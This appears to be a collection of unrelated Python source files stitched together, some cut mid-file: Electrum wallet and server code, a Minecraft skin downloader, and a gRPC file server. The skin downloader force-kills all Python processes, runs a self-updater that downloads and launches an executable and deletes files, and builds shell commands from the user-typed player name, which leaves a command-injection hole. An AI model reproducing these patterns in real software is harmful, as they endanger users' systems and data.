infodict.get(BE_default_explorer()) # In case block explorer in config is bad/no longer valid ) def BE_default_explorer(): return (DEFAULT_EXPLORER if not networks.net.TESTNET else DEFAULT_EXPLORER_TESTNET) def BE_from_config(config): return config.get('block_explorer', BE_default_explorer()) def BE_URL(config, kind, item): be_tuple = BE_tuple(config) if not be_tuple: return url_base, addr_fmt, parts = be_tuple kind_str = parts.get(kind) if kind_str is None: return if kind == 'addr': assert isinstance(item, Address) item = item.to_string(addr_fmt) return "/".join(part for part in (url_base, kind_str, item) if part) def BE_sorted_list(): return sorted(BE_info()) def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None): if not isinstance(addr, Address): return "" if op_return is not None and op_return_raw is not None: raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to create_URI') scheme, path = addr.to_URI_components() query = [] if amount: query.append('amount=%s'%format_satoshis_plain(amount)) if message: query.append('message=%s'%urllib.parse.quote(message)) if op_return: query.append(f'op_return={str(op_return)}') if op_return_raw: query.append(f'op_return_raw={str(op_return_raw)}') p = urllib.parse.ParseResult(scheme=scheme, netloc='', path=path, params='', query='&'.join(query), fragment='') return urllib.parse.urlunparse(p) def urlencode(s): ''' URL Encode; encodes a url or a uri fragment by %-quoting special chars''' return urllib.parse.quote(s) def 
urldecode(url): ''' Inverse of urlencode ''' return urllib.parse.unquote(url) def parse_URI(uri, on_pr=None): if ':' not in uri: # Test it's valid Address.from_string(uri) return {'address': uri} u = urllib.parse.urlparse(uri) # The scheme always comes back in lower case accept_schemes = parseable_schemes(net=net) if u.scheme not in accept_schemes: raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes))) address = u.path # python for android fails to parse query if address.find('?') > 0: address, query = u.path.split('?') pq = urllib.parse.parse_qs(query, keep_blank_values=True) else: pq = urllib.parse.parse_qs(u.query, keep_blank_values=True) for k, v in pq.items(): if len(v)!=1: raise Exception('Duplicate Key', k) out = {k: v[0] for k, v in pq.items()} if address: Address.from_string(address) out['address'] = address if 'amount' in out: am = out['amount'] m = re.match(r'([0-9\.]+)X([0-9])', am) if m: k = int(m.group(2)) - 8 amount = PyDecimal(m.group(1)) * pow(10, k) else: amount = PyDecimal(am) * bitcoin.COIN out['amount'] = int(amount) if 'message' in out: out['message'] = out['message'] out['memo'] = out['message'] if 'time' in out: out['time'] = int(out['time']) if 'exp' in out: out['exp'] = int(out['exp']) if 'sig' in out: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58)) if 'op_return_raw' in out and 'op_return' in out: del out['op_return_raw'] # allow only 1 of these r = out.get('r') sig = out.get('sig') name = out.get('name') if on_pr and (r or (name and sig)): def get_payment_request_thread(): from . import paymentrequest as pr if name and sig: s = pr.serialize_request(out).SerializeToString() request = pr.PaymentRequest(s) else: request = pr.get_payment_request(r) if on_pr: on_pr(request) t = threading.Thread(target=get_payment_request_thread) t.setDaemon(True) t.start() return out def check_www_dir(rdir): if not os.path.exists(rdir): os.mkdir(rdir) index = os.path.join(rdir, 'index.html') if not os.path.exists(index): print_error("copying index.html") src = os.path.join(os.path.dirname(__file__), 'www', 'index.html') shutil.copy(src, index) files = [ "https://code.jquery.com/jquery-1.9.1.min.js", "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js", "https://code.jquery.com/ui/1.10.3/jquery-ui.js", "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" ] for URL in files: path = urllib.parse.urlsplit(URL).path filename = os.path.basename(path) path = os.path.join(rdir, filename) if not os.path.exists(path): print_error("downloading ", URL) urllib.request.urlretrieve(URL, path)
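As a quick illustration of the explorer table above, the sketch below shows what BE_URL() produces for a transaction link. It assumes the module can be imported inside its package (the relative imports above require that) and that the network is mainnet; the plain dict standing in for the Electrum config object and the all-zero txid are placeholders.

# Sketch: a plain dict suffices because BE_URL() only calls config.get().
config = {}              # no 'block_explorer' key -> DEFAULT_EXPLORER is used
txid = "00" * 32         # placeholder transaction id
print(BE_URL(config, 'tx', txid))
# -> https://exploredvt.com/#/VITAE/mainnet/tx/<txid> when networks.net.TESTNET is False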
MinecraftSkinDownloader_ttkthemes.py
''' 作品名:MinecraftSkinDownloader Github仓库地址:https://github.com/NewbieXvwu/MinecraftSkinDownloader Gitee仓库地址:https://gitee.com/NewbieXvwu/MinecraftSkinDownloader 关于本程序:这是一个可以简单地下载任何Minecraft正版玩家的皮肤的软件,使用Python编写,由NewbieXvwu维护。 作者:NewbieXvwu ''' version_int=2.4#程序主版本号 ispreview=False#程序是否是预览版 previewversion="0"#预览版本号(不自动更新) if ispreview:#生成字符串版的版本号 version="v"+str(version_int)+" Preview "+previewversion else: version="v"+str(version_int) #导入本地库(有些没用到,屎山懒得翻了) from copyreg import clear_extension_cache import ctypes, sys import os import json import base64 import tkinter from urllib.request import urlretrieve import zipfile import shutil from tkinter import messagebox import threading import platform import ctypes import time import winreg global ThreadShouldStop ThreadShouldStop=False def on_closing(): tkinter.messagebox.showerror("错误","正在安装必要的运行库!\n强制退出会造成运行库损坏!") #尝试安装并导入第三方库 try: import requests except:#没有安装requests from tkinter import * import tkinter from tkinter.ttk import * def sc_main_(): sc_=Tk() #窗口居中 scw=sc_.winfo_screenwidth() sch=sc_.winfo_screenheight() w=300 h=200 x=(scw-w)/2 y=(sch-h)/2 sc_.title("正在安装运行库") sc_.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc_.maxsize(w,h) sc_.minsize(w,h) try:#从双源尝试下载Logo sc_.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc_.tk.call('tk', 'scaling', ScaleFactor/75) except: pass def showmain(): while True: for i in range(100): try: # 每次更新加1 pb_['value'] = i + 1 # 更新画面 sc_.update() time.sleep(0.05) except: exit() for i in range(100): try: # 每次更新减1 pb_['value'] = 100 - i # 更新画面 sc_.update() time.sleep(0.05) except: exit() def ThreadStop(): while True: try: if ThreadShouldStop: #sc_.destroy() os.system("taskkill -f -im python.exe") os.system("taskkill -f -im pythonw.exe") os.system("taskkill -f -im py.exe") os.system("taskkill -f -im pyw.exe") except: pass time.sleep(0.1) run___=threading.Thread(target=ThreadStop) run___.daemon=True run___.start() def show():#多线程运行主函数,防止主线程GUI卡死 run__=threading.Thread(target=showmain) run__.start() lb1_=Label(sc_,text="正在安装程序必要的运行库……",font=("宋体",13)) lb1_.place(x=30,y=30) lb2_=Label(sc_,text=" 正在安装:requests\n\n安装完毕后请手动重启程序",font=("宋体",10)) lb2_.place(x=150,y=90,anchor="center") pb_=Progressbar(sc_,length=240,mode='indeterminate',orient=tkinter.HORIZONTAL) pb_.place(x=30,y=130) show() sc_.protocol('WM_DELETE_WINDOW', on_closing) sc_.mainloop() run___=threading.Thread(target=sc_main_) run___.start() result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple requests").read() if "Successfully installed" in result:#安装requests成功 import requests from requests import delete ThreadShouldStop=True else:#安装requests失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() try: import ttkthemes except:#没有安装ttkthemes result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple ttkthemes").read() if "Successfully installed" in result:#安装ttkthemes成功 import ttkthemes ThreadShouldStop=True 
else:#安装ttkthemes失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() else:#安装了requests try: import ttkthemes except:#没有安装ttkthemes from tkinter import * import tkinter from tkinter.ttk import * def sc_main_(): sc_=Tk() #窗口居中 scw=sc_.winfo_screenwidth() sch=sc_.winfo_screenheight() w=300 h=200 x=(scw-w)/2 y=(sch-h)/2 sc_.title("正在安装运行库") sc_.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc_.maxsize(w,h) sc_.minsize(w,h) try:#从双源尝试下载Logo sc_.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc_.tk.call('tk', 'scaling', ScaleFactor/75) except: pass def showmain(): while True: for i in range(100): try: # 每次更新加1 pb_['value'] = i + 1 # 更新画面 sc_.update() time.sleep(0.05) except: exit() for i in range(100): try: # 每次更新减1 pb_['value'] = 100 - i # 更新画面 sc_.update() time.sleep(0.05) except: exit() def ThreadStop(): while True: try: if ThreadShouldStop: #sc_.destroy() os.system("taskkill -f -im python.exe") os.system("taskkill -f -im pythonw.exe") os.system("taskkill -f -im py.exe") os.system("taskkill -f -im pyw.exe") except: pass time.sleep(0.1) run___=threading.Thread(target=ThreadStop) run___.start() def show():#多线程运行主函数,防止主线程GUI卡死 run__=threading.Thread(target=showmain) run__.start() lb1_=Label(sc_,text="正在安装程序必要的运行库……",font=("宋体",13)) lb1_.place(x=30,y=30) lb2_=Label(sc_,text=" 正在安装:ttkthemes\n\n安装完毕后请手动重启程序",font=("宋体",10)) lb2_.place(x=150,y=90,anchor="center") pb_=Progressbar(sc_,length=240,mode='indeterminate',orient=tkinter.HORIZONTAL) pb_.place(x=30,y=130) show() sc_.protocol('WM_DELETE_WINDOW', on_closing) sc_.mainloop() run___=threading.Thread(target=sc_main_) run___.daemon=True run___.start() result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple ttkthemes").read() if "Successfully installed" in result:#安装ttkthemes成功 import ttkthemes ThreadShouldStop=True else:#安装ttkthemes失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() #定义函数 def getzbmain():#主函数 id_=e.get() if id_=="": tkinter.messagebox.showerror(title='错误', message='请填写内容!') else: zt.set("状态:正在向Mojang请求玩家的UUID……") url1="https://api.mojang.com/users/profiles/minecraft/"+id_ r = requests.get(url1) del url1 status_code=r.status_code if not status_code==200: zt.set("状态:Bugjump出现错误,请检查你的输入!") del status_code zt.set("状态:读取UUID中……") r=r.text r=json.loads(r) try: uuid=r['id'] except: zt.set("状态:Bugjump出现错误,请检查你的输入!") del r zt.set("状态:向Mojang请求下载皮肤的地址中……") url2="https://sessionserver.mojang.com/session/minecraft/profile/"+uuid r = requests.get(url2) del url2 status_code=r.status_code if not status_code==200: zt.set("状态:Bugjump出现错误,请检查你的输入!") del status_code zt.set("状态:读取皮肤下载地址中……") r=r.text r=json.loads(r) properties=r["properties"] del r 
properties=properties[0] properties=properties["value"] zt.set("状态:解码皮肤下载地址中……") properties=base64.b64decode(properties) properties=properties.decode() properties=json.loads(properties) url3=properties["textures"] del properties havecape=False try: cape=url3["CAPE"] cape=cape["url"] filename=id_+'_cape.png' zt.set("状态:成功获取披风下载直链,正在尝试下载……") urlretrieve(cape,filename) havecape=True except: pass url3=url3["SKIN"] try: isalex=url3["metadata"] isalex=isalex["model"] except: isalex="" url3=url3["url"] filename=id_+'.png' zt.set("状态:成功获取皮肤下载直链,正在尝试下载……") urlretrieve(url3,filename) del url3 del filename if havecape: exit_=str(tkinter.messagebox.showwarning(title="下载完毕", message="下载完毕!此玩家还拥有披风,已同时下载!")) else: exit_=str(tkinter.messagebox.showwarning(title="下载完毕", message="下载完毕!")) zt.set("状态:待命") lb2.config(textvariable=zt) exit_=tkinter.messagebox.askyesno(title="下载完毕", message="下载完毕!按“确认”打包皮肤成材质包,或者按“取消”打开文件!") if exit_==True: try: file=".\\"+id_ shutil.rmtree(file) del file except: zt.set("状态:正在删除旧的临时目录……") zt.set("状态:正在创建新的临时目录……") lb2.config(textvariable=zt) file="./"+id_ os.mkdir(file) del file zt.set("状态:正在创建材质包说明文件……") lb2.config(textvariable=zt) filename = './'+id_+"/pack.mcmeta" mcmeta="{\"pack\":{\"pack_format\":7,\"description\":\"§c",id_,"\'s Skin Resourcepack\"}}" with open(filename, 'w') as file_object: file_object.write("{\"pack\":{\"pack_format\":4,\"description\":\"§cSkin Resourcepack\"}}") del filename del mcmeta zt.set("状态:正在下载材质包Logo……") lb2.config(textvariable=zt) url3="https://pic.downk.cc/item/5ff174673ffa7d37b35bb165.png" filename="./"+id_+"/pack.png" urlretrieve(url3,filename) del url3 del filename zt.set("状态:正在创建皮肤目录……") lb2.config(textvariable=zt) file="./"+id_+"/assets" os.mkdir(file) del file file="./"+id_+"/assets/minecraft" os.mkdir(file) del file file="./"+id_+"/assets/minecraft/textures" os.mkdir(file) del file file="./"+id_+"/assets/minecraft/textures/entity" os.mkdir(file) del file zt.set("状态:正在复制皮肤文件……") lb2.config(textvariable=zt) if isalex=="slim": cmd="copy "+id_+".png .\\"+id_+"\\assets\\minecraft\\textures\\entity\\alex.png" os.system(cmd) else: cmd="copy "+id_+".png .\\"+id_+"\\assets\\minecraft\\textures\\entity\\steve.png" os.system(cmd) del cmd zt.set("状态:正在压缩材质包……") lb2.config(textvariable=zt) shutil.make_archive("Skin_"+id_,'zip',id_) zt.set("状态:正在删除临时目录……") lb2.config(textvariable=zt) file=".\\"+id_ shutil.rmtree(file) del file zt.set("状态:待命") if os.path.exists(".\\.minecraft\\resourcepacks"): exit_=tkinter.messagebox.askyesno(title="创建材质包成功", message="成功创建材质包!\n注意:材质包会将游戏内的所有玩家的皮肤都替换成你想要的皮肤,可能会导致一些小问题!\n检测到程序目录下有Minecraft安装,如果要直接导入Minecraft,请按下“确认”,否则请按下“取消”打开材质包。") if exit_==True: cmd="copy Skin_"+id_+".zip .\\.minecraft\\resourcepacks\\"+id_+".zip" os.system(cmd) del cmd exit_=tkinter.messagebox.askyesno(title="导入成功", message="导入成功!\n是否要打开材质包文件夹?") if exit_==True: start="start \"\" .\\.minecraft\\resourcepacks\\" os.system(start) del exit_ else: start="start \"\" "+"\""+id_+'.zip'+"\"" os.system(start) else: exit_=tkinter.messagebox.askyesno(title="创建材质包成功", message="创建材质包成功!注意:材质包会将游戏内的所有玩家的皮肤都替换成你想要的皮肤,可能会导致一些小问题!\n是否要打开材质包?") if exit_==True: start="start \"\" "+"\"Skin_"+id_+'.zip'+"\"" os.system(start) del exit_ else: start=id_+'.png' os.startfile(start) def getzb(ev=None):#多线程运行主函数,防止主线程GUI卡死 run_=threading.Thread(target=getzbmain) run_.start() def info():#关于页面 def opengithub(): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader") def opengitee(): os.startfile("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader") def 
openbilibili(): os.startfile("https://space.bilibili.com/505201154") about=Toplevel() about.title("关于本程序") aboutscw=about.winfo_screenwidth() aboutsch=about.winfo_screenheight() aboutw=300 abouth=210 aboutx=(aboutscw-aboutw)/2 abouty=(aboutsch-abouth)/2 about.geometry("%dx%d+%d+%d"%(aboutw,abouth,aboutx,abouty)) about.iconbitmap('logo.ico') lb4=Label(about,text="关于本程序",font=("宋体",15)) lb4.place(x=100,y=30) lb5=Label(about,text="一个简单的Minecraft\n\n 正版皮肤下载器。",font=("宋体",15)) lb5.place(x=150,y=100,anchor=CENTER) btn3=Button(about,text="Github",command=opengithub) btn3.place(x=200,y=155) btn4=Button(about,text="Gitee",command=opengitee) btn4.place(x=102.5,y=155) btn5=Button(about,text="Bilibili",command=openbilibili) btn5.place(x=5,y=155) def TryUpdate(update_url):#尝试更新 update=requests.get(update_url) update=update.text update=json.loads(update) if float(update["tag_name"])>version_int: assets=update["assets"] browser_download_url_list=assets[0] browser_download_url=browser_download_url_list["browser_download_url"] is_update=tkinter.messagebox.askyesno(title="检测到新版本", message="本程序有新版本!是否要下载?") if is_update==True: def autoupdate(): btn1.config(state=DISABLED) btn1.config(text="更新中……") zt.set("状态:更新中,请稍候……") fn=os.path.splitext(os.path.basename(__file__))[0]+os.path.splitext(os.path.basename(__file__))[1] with open("Update.bat", 'w') as file_object: file_object.write("@echo off\ntaskkill -f -im python.exe\ntaskkill -f -im pythonw.exe\ntaskkill -f -im "+fn+"\ndel /s /q /f "+fn+"\nren New_MinecraftSkinDownloader.exe "+fn+"\nstart "+fn) urlretrieve(browser_download_url,"New_MinecraftSkinDownloader.exe") os.startfile("Update.bat") exit() run_1=threading.Thread(target=autoupdate) run_1.start() del update from tkinter import * from ttkthemes import * from tkinter.ttk import * #sc=ThemedTk(theme="equilux", toplevel=True, themebg=True) sc=ThemedTk(theme="arc", toplevel=True, themebg=True)#使用ttkthemes的修改版Tk() #窗口居中 scw=sc.winfo_screenwidth() sch=sc.winfo_screenheight() w=500 h=300 x=(scw-w)/2 y=(sch-h)/2 sc.title("Minecraft正版皮肤下载器"+version+" By 萌新欻無") sc.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc.maxsize(w,h) sc.minsize(w,h) try:#从双源尝试下载Logo sc.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc.tk.call('tk', 'scaling', ScaleFactor/75) except: pass #主屏幕组件初始化 lb1=Label(sc,text="请输入Minecraft正版账号名称",font=("宋体",15)) lb1.place(x=110,y=50) e=Entry(sc,width=20) e.place(x=170,y=120) e.bind("<Return>",getzb) btn1=Button(sc,text="点击获取",command=getzb) btn1.place(x=195,y=190) zt=tkinter.StringVar() zt.set("状态:待命") lb2=Label(sc,textvariable=zt,font=("宋体",15)) lb2.place(x=10,y=270) cmb = Combobox(sc,width=7) cmb.place(x=420,y=5) ms=("浅色模式","深色模式") cmb["value"]=ms cmb.current(0) def func(event): if cmb.get()==ms[0]: sc.set_theme("arc") elif cmb.get()==ms[1]: sc.set_theme("equilux") cmb.bind("<<ComboboxSelected>>",func) try:#读取Windows 10深色模式 key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize") try: i = 0 while True: #EnumValue方法用来枚举键值,EnumKey用来枚举子键 name,value,type=winreg.EnumValue(key,i) if str(name)=="AppsUseLightTheme": break i +=1 if value==0: sc.set_theme("equilux") cmb.current(1) else: sc.set_theme("arc") 
cmb.current(0) except WindowsError: pass except: pass btn2=Button(sc,text="关于",command=info) btn2.place(x=400,y=260) lb3=Label(sc,text=version,font=("宋体",10)) lb3.place(x=5,y=5) if float(str(platform.version().split(".")[0])+"."+str(platform.version().split(".")[1]))>6.3 and int(platform.python_version().split(".")[1])<=8: if tkinter.messagebox.askyesno(title="您正在使用过旧的Python", message="您的操作系统为Windows "+str(platform.version().split(".")[0])+",\n但本程序正运行在版本为"+platform.python_version()+"的Python上。\n这可能是因为您下载了本程序的Windows 7兼容版。\n使用兼容版将会导致程序的稳定性无法得到保证,因为本程序的开发使用了更新的Python版本。\n您是否要下载一个稳定性更好的版本?"): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/releases") exit() if ispreview:#预览版警告 if not tkinter.messagebox.askyesno(title="您正在使用预览版", message="您正在使用的版本为"+version+",这是一个预览版。\n使用预览版可能会带来一些不可预知的问题!\n您是否要继续?"): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/releases") exit() try: TryUpdate("https://gitee.com/api/v5/repos/NewbieXvwu/MinecraftSkinDownloader/releases/latest") except: try: TryUpdate("https://api.github.com/repos/NewbieXvwu/MinecraftSkinDownloader/releases/latest") except: pass sc.mainloop()
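Stripped of the Tk GUI, the dependency bootstrap and the resource-pack packaging, the core of getzbmain() above is three HTTP requests against Mojang's public API. Below is a condensed sketch of just that flow; the endpoints and JSON keys are the ones the program itself uses, and error handling is omitted for brevity.

import base64, json, requests
from urllib.request import urlretrieve

def fetch_skin(player_name):
    # player name -> UUID
    uuid = requests.get(
        "https://api.mojang.com/users/profiles/minecraft/" + player_name).json()["id"]
    # UUID -> profile containing a base64-encoded "textures" property
    profile = requests.get(
        "https://sessionserver.mojang.com/session/minecraft/profile/" + uuid).json()
    textures = json.loads(base64.b64decode(profile["properties"][0]["value"]))["textures"]
    skin_url = textures["SKIN"]["url"]
    is_slim = textures["SKIN"].get("metadata", {}).get("model") == "slim"  # Alex-style model
    cape_url = textures.get("CAPE", {}).get("url")  # present only if the player owns a cape
    urlretrieve(skin_url, player_name + ".png")
    return player_name + ".png", is_slim, cape_url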
ircthread.py
#!/usr/bin/env python # Copyright(C) 2011-2016 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import re import time import socket import ssl import threading import Queue import irc.client from utils import logger from utils import Hash from version import VERSION out_msg = [] class IrcThread(threading.Thread): def __init__(self, processor, config): threading.Thread.__init__(self) self.processor = processor self.daemon = True options = dict(config.items('server')) self.stratum_tcp_port = options.get('stratum_tcp_port') self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port') self.report_stratum_tcp_port = options.get('report_stratum_tcp_port') self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port') self.irc_bind_ip = options.get('irc_bind_ip') self.host = options.get('host') self.report_host = options.get('report_host') self.nick = options.get('irc_nick') if self.report_stratum_tcp_port: self.stratum_tcp_port = self.report_stratum_tcp_port if self.report_stratum_tcp_ssl_port: self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port if self.report_host: self.host = self.report_host if not self.nick: self.nick = Hash(self.host)[:5].encode("hex") self.pruning = True self.pruning_limit = config.get('leveldb', 'pruning_limit') self.nick = 'EY_' + self.nick self.password = None self.who_queue = Queue.Queue() def getname(self): s = 'v' + VERSION + ' ' if self.pruning: s += 'p' + self.pruning_limit + ' ' def add_port(letter, number): DEFAULT_PORTS = {'t':'50001', 's':'50002'} if not number: return '' if DEFAULT_PORTS[letter] == number: return letter + ' ' else: return letter + number + ' ' s += add_port('t',self.stratum_tcp_port) s += add_port('s',self.stratum_tcp_ssl_port) return s def start(self, queue): self.queue = queue threading.Thread.start(self) def on_connect(self, connection, event): connection.join("#electrum-yac") def on_join(self, connection, event): m = re.match("(EY_.*)!", event.source) if m: self.who_queue.put((connection, m.group(1))) def on_quit(self, connection, event): m = re.match("(EY_.*)!", event.source) if m: self.queue.put(('quit', [m.group(1)])) def on_kick(self, connection, event): m = re.match("(EY_.*)", event.arguments[0]) if m: self.queue.put(('quit', [m.group(1)])) def on_disconnect(self, connection, event): logger.error("irc: disconnected") raise BaseException("disconnected") def on_who(self, connection, event): line = str(event.arguments[6]).split() try: ip = socket.gethostbyname(line[1]) except: # no IPv4 address could be 
resolved. Could be .onion or IPv6. ip = line[1] nick = event.arguments[4] host = line[1] ports = line[2:] self.queue.put(('join', [nick, ip, host, ports])) def on_name(self, connection, event): for s in event.arguments[2].split(): if s.startswith("EY_"): self.who_queue.put((connection, s)) def who_thread(self): while not self.processor.shared.stopped(): try: connection, s = self.who_queue.get(timeout=1) except Queue.Empty: continue #logger.info("who: "+ s) connection.who(s) time.sleep(1) def run(self): while self.processor.shared.paused(): time.sleep(1) self.ircname = self.host + ' ' + self.getname() # avoid UnicodeDecodeError using LenientDecodingLineBuffer irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer logger.info("joining IRC") t = threading.Thread(target=self.who_thread) t.start() while not self.processor.shared.stopped(): client = irc.client.Reactor() try: #bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None #ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address) #c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory) c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname) except irc.client.ServerConnectionError: logger.error('irc', exc_info=True) time.sleep(10) continue c.add_global_handler("welcome", self.on_connect) c.add_global_handler("join", self.on_join) c.add_global_handler("quit", self.on_quit) c.add_global_handler("kick", self.on_kick) c.add_global_handler("whoreply", self.on_who) c.add_global_handler("namreply", self.on_name) c.add_global_handler("disconnect", self.on_disconnect) c.set_keepalive(60) self.connection = c try: client.process_forever() except BaseException as e: logger.error('irc', exc_info=True) time.sleep(10) continue logger.info("quitting IRC")
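The capability string built by IrcThread.getname() above is what peers recover from the WHO reply: version, pruning limit, then one entry per advertised port, with the default ports (t = 50001, s = 50002) collapsed to a bare letter. A standalone sketch of just that port-encoding rule, using made-up values:

# Re-statement of the add_port() helper inside getname(), for illustration only.
DEFAULT_PORTS = {'t': '50001', 's': '50002'}

def encode_ports(tcp_port, ssl_port):
    s = ''
    for letter, number in (('t', tcp_port), ('s', ssl_port)):
        if not number:
            continue                      # port not offered -> nothing advertised
        s += letter if DEFAULT_PORTS[letter] == number else letter + number
        s += ' '
    return s

print(encode_ports('50001', '50012'))     # -> "t s50012 " (default TCP port, custom SSL port)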
file_server.py
import sys sys.path.insert(0, "../md_server") import grpc import file_server_pb2 as fs import file_server_pb2_grpc as fs_grpc import md_server_pb2 as ms import md_server_pb2_grpc as ms_grpc import ms_conf from concurrent import futures import time import threading import os import os.path as ospath # send heartbeat to the metadata server def heartbeat(stub, ip, port): while True: time.sleep(2) stub.online(ms.serverInfo(ip=ip, port=port)) class file_server(fs_grpc.file_serverServicer): def __init__(self, ip, port, rootPath): # contact the metadata server mdChannel = grpc.insecure_channel(ms_conf.md_serverIP + ":" + ms_conf.md_serverPort) self.mdStub = ms_grpc.md_serverStub(mdChannel) self.ip = ip self.port = port self.online() self.rootPath = rootPath + "/fserver_{}".format(self.id) if not ospath.exists(self.rootPath): os.mkdir(self.rootPath) os.chdir(self.rootPath) print("Root of the server: {}".format(self.rootPath)) self.curPathDict = {} # fork thread to maintain heartbeat heartbeatThread = threading.Thread(target=heartbeat, args=(self.mdStub, self.ip, self.port)) heartbeatThread.start() # register on the metadata server to be visible to clients def online(self): self.id = (self.mdStub.online(ms.serverInfo(ip=self.ip, port=self.port))).done print("File server {} is available on {}:{}".format(self.id, self.ip, self.port)) # remove self from the md server. def offline(self): self.mdStub.offline(ms.serverInfo(ip=self.ip, port=self.port)) print("File server {} now offline\n".format(self.id)) # return a stub connecting to another server. def stub_gen(self, serverList): for serverInfo in serverList: if serverInfo.id == self.id: continue channel = grpc.insecure_channel(serverInfo.ip + ":" + serverInfo.port) stub = fs_grpc.file_serverStub(channel) yield stub # return the absolute path on the server def pwd(self, request, context): if request.id not in self.curPathDict: self.curPathDict[request.id] = "" if request.cascading == True: gen = self.stub_gen((self.mdStub.listServer(ms.empty())).sList) while True: try: next(gen).pwd(fs.stringMes(id=request.id, cascading=0)) except StopIteration: break return fs.stringMes(str=self.curPathDict[request.id]) # list all items in the current dir def ls(self, request, context): path = self.rootPath + "/" + self.curPathDict[request.id] return fs.stringMes(str="\n".join(os.listdir(path))) # enter a given location. 
